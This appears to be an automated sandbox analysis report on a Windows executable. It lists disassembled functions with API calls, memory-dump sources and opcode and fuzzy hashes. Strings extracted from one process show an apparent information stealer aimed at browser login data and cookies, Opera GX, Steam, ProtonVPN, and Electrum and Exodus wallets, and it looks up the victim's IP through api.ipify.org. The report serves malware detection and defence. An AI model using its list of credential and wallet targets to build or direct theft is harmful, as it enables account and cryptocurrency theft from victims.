Function 02D374A8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,02D37361,?,?), ref: 02D37508

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4992dc3cd70e430654729af8a413dc4e9db14179f00a8d98a89d726de252318a
Instruction ID: 947d4fbb3c2285d00456b4e954592db4a9f256dafbcaa73cac471a341c41db2e
Opcode Fuzzy Hash: 4992dc3cd70e430654729af8a413dc4e9db14179f00a8d98a89d726de252318a
Instruction Fuzzy Hash: E41125B6C007498FDB10DF99C585BDEBBF4EB48320F10841AD558A7340D738A944CFA5

Function 02D32FE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 02D33042

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f2f0352d815860c91b5b7949df3f886a1e6582ffe089a3282750ead408daedbc
Instruction ID: 453eb06a6a95ed9718e0aef69458d99717d56fa5fefd717df179b1d74e609bb8
Opcode Fuzzy Hash: f2f0352d815860c91b5b7949df3f886a1e6582ffe089a3282750ead408daedbc
Instruction Fuzzy Hash: 2D1125B1D003498BDB20DFAAC44979FFFF4EB88324F208419D519A7240CB79A945CBA5

Function 02D36518 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 02D3657D

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 988ffa8a9db6964b504b959491aaae22765210e11ac8a27239c4a1b5f52369a4
Instruction ID: d4203dcb5958995efd657a583baf70d71c2048906083a4b340bbdbe752ebb8e8
Opcode Fuzzy Hash: 988ffa8a9db6964b504b959491aaae22765210e11ac8a27239c4a1b5f52369a4
Instruction Fuzzy Hash: E311E0B58003499FCB10DF9AD889BDEBBF8EB48310F108419E518A7250C375A944CFA5

Function 02D34760 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 02D3657D

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c4778df4856a1a4c8cf8933f3cc3c11fb8e9cd6767b7f028f3f195ead58f9e0c
Instruction ID: 5ba5496143c8a3f446ba47fef83a6cd3f97cfad2c2b0bb4bef87a584c526429f
Opcode Fuzzy Hash: c4778df4856a1a4c8cf8933f3cc3c11fb8e9cd6767b7f028f3f195ead58f9e0c
Instruction Fuzzy Hash: 4511E0B68003499FDB10DF9AD888BDEBBF8EB48310F108459E919A7310C375A944CFA5

Function 0151B260 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0151B2C6

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fffe9810995c1a8cfb621f2ee0be0d5913b6fb53a72ba3596174d17b0cacaf07
Instruction ID: 650c7c08587eaa2a22580e49b691f20391c9a14a34b717ffd9e4026689ac788d
Opcode Fuzzy Hash: fffe9810995c1a8cfb621f2ee0be0d5913b6fb53a72ba3596174d17b0cacaf07
Instruction Fuzzy Hash: DF11E0B5C002498FDB10DF9AD444ADEFBF4EF88320F10851AD529BB610C375A549CFA1

Function 0151B259 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0151B2C6

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 38fc4ff20ee31062d40e7b37b9b27b1f94b1d68d870606df55c702152fd79bea
Instruction ID: 8cbfe47de042fe59c696a076eb9a5dfad6d75a0a46a061a97d69e6213c45c71f
Opcode Fuzzy Hash: 38fc4ff20ee31062d40e7b37b9b27b1f94b1d68d870606df55c702152fd79bea
Instruction Fuzzy Hash: 661102B6C002498FDB10CFAAD444BDEFBF4EF48210F10841AD469AB610C374A545CFA1

Function 0116D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057251875.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_116d000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17e13208713530f5009f2c22e4390087ab4b6cbb1e8af4e69c702d042efa9ebb
Instruction ID: f1baa3af39b78c6a97ea39efb9b07cf591d29d71438dd99971c422a08d7bcccb
Opcode Fuzzy Hash: 17e13208713530f5009f2c22e4390087ab4b6cbb1e8af4e69c702d042efa9ebb
Instruction Fuzzy Hash: 9A2129B1604240EFDF09DF98E5C0B25BBA9FB84324F24C56DED894B252C337D466CA62

Function 0116D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057251875.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_116d000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a140b8be270b7cfae7d81bcfd3da40d1d6e82f27ff3dcac7d000d80d2995d7c
Instruction ID: 0df31bea28b037872a86c56e2bd538c4ebcfd40b392246f3691ade5d762f323c
Opcode Fuzzy Hash: 0a140b8be270b7cfae7d81bcfd3da40d1d6e82f27ff3dcac7d000d80d2995d7c
Instruction Fuzzy Hash: C3212571604240DFDF19DF58E5C0B26BB69EB84314F24C56DD88A0B246C337D427CA62

Function 0116D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057251875.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_116d000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3ccd85e30a0f7061497da8a979fb0b22893bee1f538abd9643090ab0da6519
Instruction ID: 7f20acd12bcf5451d6cb81c33d2f1c447f8b3bf9e6cbb7f4f13f61318ee68350
Opcode Fuzzy Hash: bb3ccd85e30a0f7061497da8a979fb0b22893bee1f538abd9643090ab0da6519
Instruction Fuzzy Hash: E12192755093808FDB07CF24D994B15BF71EB46214F28C5DAD8898F6A7C33B981ACB62

Function 0116D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057251875.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_116d000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: 3acd448ba78decfce1be2989146542df4e5d89440137b4541a1b5f8ae969993e
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: 9E11EB75A04280CFCB06CF54E5C0B15BBA1FB84224F28C6ADDC894B292C33BD41ACB62

Non-executed Functions

Function 02D37E28 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deb81fa900630a743e313cd5b7c281a560a3db36ed385ba787e55ca4b71ccf94
Instruction ID: b44e8f3c15ec5060750c37dbd43d94cbdd845a6ffb3f745cde2e722612675d43
Opcode Fuzzy Hash: deb81fa900630a743e313cd5b7c281a560a3db36ed385ba787e55ca4b71ccf94
Instruction Fuzzy Hash: C6E1CBB0B026458FEB2ADB75C450BAEB7F6AF89300F1484A9E145DB390DB39DD41CB61

Function 053B0040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2059616061.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53b0000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea3a6a71625739b075f43844c0db84aee480a930108dc264714d89a368d12703
Instruction ID: cb084f909347be2fb9e7da569d27d75ea2e8daf3320558b35c9ac61b263cf429
Opcode Fuzzy Hash: ea3a6a71625739b075f43844c0db84aee480a930108dc264714d89a368d12703
Instruction Fuzzy Hash: B91296B0CC17458AD710CFA6E94C58A3FB1B792314BF04A29D1617A2E5DBB425EBCF44

Function 02D310B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddf695c548b954ee0bb59c2b9aae095a89a3d981c84fe442f018e97eeeec2a3
Instruction ID: 6a87b71635323e84e27bf8916ee6203ad1b7f7fb6f630477547b334bcf60ade7
Opcode Fuzzy Hash: eddf695c548b954ee0bb59c2b9aae095a89a3d981c84fe442f018e97eeeec2a3
Instruction Fuzzy Hash: 1EE1D774E0021A8FCB14DFA9C580AAEFBF2BF89305F248169E459AB355D731AD41CF61

Function 02D30848 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6deeb31280d78e7ff48ff7d0ddd0cb796649787bc8087b62bb83250c1672ab
Instruction ID: 3eca7cf533f143777bf9b8ce5e38d2d032d1ab68d12c5e412bde4ac2463e8453
Opcode Fuzzy Hash: 9c6deeb31280d78e7ff48ff7d0ddd0cb796649787bc8087b62bb83250c1672ab
Instruction Fuzzy Hash: 46E1F674E002198FCB14DFA9C580AAEFBF2BF89305F248169E455AB356D730AD41CFA1

Function 02D33168 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133c2dafb75a6179c7bc6c75ea50fda39591cd53b7d0c10a66211c0b46295016
Instruction ID: b73e90fe8d196bc6c6e9e451955aaee4f7afaef4017eb4b942172d6479059acd
Opcode Fuzzy Hash: 133c2dafb75a6179c7bc6c75ea50fda39591cd53b7d0c10a66211c0b46295016
Instruction Fuzzy Hash: D3E1E574E002598FCB15DFA9C5809AEFBF2BF89304F2481A9E855AB355D730AD41CFA1

Function 02D32760 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9851ff782be447c4e110412dfbf5ddfdaa8ad360ca5f473aa3991ddfe607a68e
Instruction ID: a3a03693af1d9113f828700f9f47de1ce62d0b6aafa5d04a654b631b701abeea
Opcode Fuzzy Hash: 9851ff782be447c4e110412dfbf5ddfdaa8ad360ca5f473aa3991ddfe607a68e
Instruction Fuzzy Hash: D7E10774E002198FDB14DFA9C9849AEFBF2BF89304F248169E855AB359D730AD41CF61

Function 02D30C80 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c23883f2adc4c0342b8ef601d70abedd7e63ff8d538c124155149fb6c9e8e3e
Instruction ID: 51a398eafc3e382650414834a36442686404ce8303e60570d10a8d7fe1e3e23a
Opcode Fuzzy Hash: 7c23883f2adc4c0342b8ef601d70abedd7e63ff8d538c124155149fb6c9e8e3e
Instruction Fuzzy Hash: 10E12674E002198FCB14DFA9C580AAEFBF2BF89305F24816AE459AB355D731AD41CF61

Function 0151DEA4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5cfa7e2b0504193f50adc5b5e580b4fad2eb2604acdc51979aaad6ec4a0382e
Instruction ID: d6e4d66cb07a9fa6d474aaf3bfaf0de798e968118084552a792c4bc9af6934d0
Opcode Fuzzy Hash: b5cfa7e2b0504193f50adc5b5e580b4fad2eb2604acdc51979aaad6ec4a0382e
Instruction Fuzzy Hash: 30A16F32E002168FDF06DFB5D8445DEBBB2FF84300B25456AE905AF269DB71E956CB80

Function 053B0006 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2059616061.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53b0000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c90138ab0355ef199f7b5776c1e193f6e1a688dfb11429e372f46b7aa7eedb
Instruction ID: 100c78d1459ddb8cd71f0dbaa47ac091f2ada8a9993b039e76feeaff198493f6
Opcode Fuzzy Hash: 61c90138ab0355ef199f7b5776c1e193f6e1a688dfb11429e372f46b7aa7eedb
Instruction Fuzzy Hash: E8C1F5B0CC17458AD710CFA6E84858A3FB1AB96314BF04A29D1617B2E5DBB434EBCF44

Function 053BEF62 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2059616061.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53b0000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f2612a1301be22f9617d64370410c4f8d7ca94d8ee885405c7f3d5f3292343
Instruction ID: d850bdc4e7e822e768a217a21b998df1f9b78573b7cdfd840eea11847ea99fd5
Opcode Fuzzy Hash: e4f2612a1301be22f9617d64370410c4f8d7ca94d8ee885405c7f3d5f3292343
Instruction Fuzzy Hash: 8451A34241E3E21EE743AB7CACB03D63F60AF43265F5A55D7D8D48E4A3D508894DC3AA

Function 02D33158 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d9089f9525872fd03986c7f66177b4b6168bf2aa55ff01853d119f8c11b66e
Instruction ID: c8177de4f29732bac39da97c1ba5db4821da044a198a49e7caa51b85f707f0ac
Opcode Fuzzy Hash: 78d9089f9525872fd03986c7f66177b4b6168bf2aa55ff01853d119f8c11b66e
Instruction Fuzzy Hash: 61513B75E002198BCB14DFA9C9416AEFBF2FF89314F24C16AE418AB355D7349942CFA1

Function 02D32750 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947598a4ce68d255d06da7ff316f87c830dfa4652ee0eb190cee8014d4d81e6f
Instruction ID: 80aa825aa9207662d58b6e67f1ea139593efeae734dec712d88e46f08e274807
Opcode Fuzzy Hash: 947598a4ce68d255d06da7ff316f87c830dfa4652ee0eb190cee8014d4d81e6f
Instruction Fuzzy Hash: B551F874E102198BDB14DFA9D9845AEFBF2BF89304F24816AD818AB355D7309D42CFA1

Analysis Process: UzQWEAhf9B.exePID: 6720, Parent PID: 5908COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	1

Executed Functions

Function 082718C0 Relevance: 6.6, Strings: 5, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI, xrefs: 082719BA
Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt, xrefs: 08271B60
C"], xrefs: 0827194B
%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN, xrefs: 08271B9A
Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S, xrefs: 082719FD

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: %USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN$Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI$Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt$Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S$C"]
API String ID: 0-2121658703
Opcode ID: e9756e612f860d74afe6d5b4b766957a109a518474379101b14dca38f6a5a85f
Instruction ID: aaeaa0429d74bfc1ac8b772574e043f54baa494b4ca3c43a1b66e1432d4c3f24
Opcode Fuzzy Hash: e9756e612f860d74afe6d5b4b766957a109a518474379101b14dca38f6a5a85f
Instruction Fuzzy Hash: 5DE19070A1071A8BDB14DF79C85479EB7B2BF84300F60C569D849AB394EF74AD85CB80

Function 082718B0 Relevance: 5.3, Strings: 4, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI, xrefs: 082719BA
Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt, xrefs: 08271B60
C"], xrefs: 0827194B
Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S, xrefs: 082719FD

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI$Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt$Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S$C"]
API String ID: 0-4031995285
Opcode ID: c8eb827b9761acf1536d147362fdaa0f0ecc81e0638bfade82f92d31ce293583
Instruction ID: 2c69081a97163194ca2989ebed296181c2f139f2bda64326eb79490dba4d2f3c
Opcode Fuzzy Hash: c8eb827b9761acf1536d147362fdaa0f0ecc81e0638bfade82f92d31ce293583
Instruction Fuzzy Hash: C7D19D70A107168BDB14DF79C85479EB7B2BF84300F20C669D849AB395EF74AD86CB90

Function 08271E4C Relevance: 4.0, Strings: 3, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI, xrefs: 082719BA
Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt, xrefs: 08271B60
Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S, xrefs: 082719FD

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI$Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt$Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S
API String ID: 0-3651987131
Opcode ID: ca2db965d5cde477cac92e6b540c32a27436966a2de871d44e9ae81ec2974f2c
Instruction ID: 973da7a33df3723c6c4c383f364891d912597002570242e1fc2f485e4f12d15f
Opcode Fuzzy Hash: ca2db965d5cde477cac92e6b540c32a27436966a2de871d44e9ae81ec2974f2c
Instruction Fuzzy Hash: BDC19F71E1071A8BDB14DF75C85479EB7B2BF88300F60C669D809AB294EF749D86CB80

Function 08271470 Relevance: 2.8, Strings: 2, Instructions: 265COMMON

Download Yara Rule

Strings

waasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkd, xrefs: 0827154C, 08271630
waasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID:, xrefs: 08271505, 082715E9

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: waasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID:$waasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkd
API String ID: 0-3720219448
Opcode ID: 551fb127c0bc377369c89f12e904e6c28f9b872cf778e97dfa40aab486e7f534
Instruction ID: 38143abc1b995583b911cafec4d5de8a6f35e913b98481f7aded823f11bffa1d
Opcode Fuzzy Hash: 551fb127c0bc377369c89f12e904e6c28f9b872cf778e97dfa40aab486e7f534
Instruction Fuzzy Hash: A9A15F30B106168FEB15EF75C85069EB7B3BFC5300F248629D806AB399DF75AC468B91

Function 082738A0 Relevance: 1.9, Strings: 1, Instructions: 621COMMON

Download Yara Rule

Strings

$cq, xrefs: 08273E52

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: $cq
API String ID: 0-2110363268
Opcode ID: afcf55e54035e158d0cc4cd8c62d1da9ddfbc21027826947e7fe77294b3ad2c1
Instruction ID: 1b2604d72cb184abfd5f69ff5b40322be7feb955fc17fa27ad725842e3d56973
Opcode Fuzzy Hash: afcf55e54035e158d0cc4cd8c62d1da9ddfbc21027826947e7fe77294b3ad2c1
Instruction Fuzzy Hash: CF326A70B10205CFCB15DF69C488AAABBF2BF88301F5584A9E546DB3A1CB75ED41CB91

Function 082741D8 Relevance: 1.7, Strings: 1, Instructions: 422COMMON

Download Yara Rule

Strings

@, xrefs: 0827466F

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: fb706b4ade5cc78173c7d3e75388de8e6399549901421775efec07339a86c8c9
Instruction ID: be3605d431143d19c91b4822648facdb58f884ac3dc24882c8c3e501b023f66c
Opcode Fuzzy Hash: fb706b4ade5cc78173c7d3e75388de8e6399549901421775efec07339a86c8c9
Instruction Fuzzy Hash: FD028AB0A10205DFDB19EFB5C494AAE7BF2BF88301F15812DE5069B294CB39DD42CB91

Function 08273162 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5411820aee94592e35134249a26234fbed235ce9381b6457b30eea1db85f4b0
Instruction ID: 99c60b392969e4916f1ab286a32afdb999c9b9cde56bb2f4d9f88e08925928b0
Opcode Fuzzy Hash: e5411820aee94592e35134249a26234fbed235ce9381b6457b30eea1db85f4b0
Instruction Fuzzy Hash: 50B182F4A002149FDB55EB69D854A9EBBF6EFC8300F15C229E4099B3A5DF309D428B91

Function 08273188 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a90e826138521532fbfed67600ce6709310a8622a744ac1b6684dbdbc1262bb
Instruction ID: e45189387584818687f254a36c9d2aeb4f70f09cb0bbc3f53cacf8a8e05808e9
Opcode Fuzzy Hash: 7a90e826138521532fbfed67600ce6709310a8622a744ac1b6684dbdbc1262bb
Instruction Fuzzy Hash: BBA151F4A00115EFDB54EB69D854A9EBBF6EFC8300F15C229E4099B3A5DF309D428B91

Function 0827AE00 Relevance: 4.0, Strings: 3, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$cq, xrefs: 0827B064
displayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGO, xrefs: 0827AFC8, 0827B02E
$cq, xrefs: 0827B000

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

